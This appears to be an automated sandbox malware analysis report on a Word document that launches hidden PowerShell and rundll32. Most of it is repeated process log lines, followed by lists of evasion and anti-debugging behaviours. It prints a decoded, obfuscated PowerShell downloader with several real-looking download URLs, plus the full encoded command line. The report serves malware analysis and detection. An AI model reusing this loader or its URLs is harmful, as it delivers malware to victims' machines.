Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2516 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2092815275.0000000000274000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 00000007.00000002.2095781612.00000000006BD000.00000004.00000020.sdmp Binary or memory string: PPTP00VMware_S
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 7_2_100011C0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026C4FF mov eax, dword ptr fs:[00000030h] 7_2_0026C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024C4FF mov eax, dword ptr fs:[00000030h] 8_2_0024C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AC4FF mov eax, dword ptr fs:[00000030h] 9_2_003AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021C4FF mov eax, dword ptr fs:[00000030h] 10_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040C4FF mov eax, dword ptr fs:[00000030h] 11_2_0040C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AC4FF mov eax, dword ptr fs:[00000030h] 12_2_002AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AC4FF mov eax, dword ptr fs:[00000030h] 13_2_002AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026C4FF mov eax, dword ptr fs:[00000030h] 14_2_0026C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_020AC4FF mov eax, dword ptr fs:[00000030h] 15_2_020AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0023C4FF mov eax, dword ptr fs:[00000030h] 16_2_0023C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0021C4FF mov eax, dword ptr fs:[00000030h] 17_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_003DC4FF mov eax, dword ptr fs:[00000030h] 18_2_003DC4FF
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 7_2_10001B30
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcA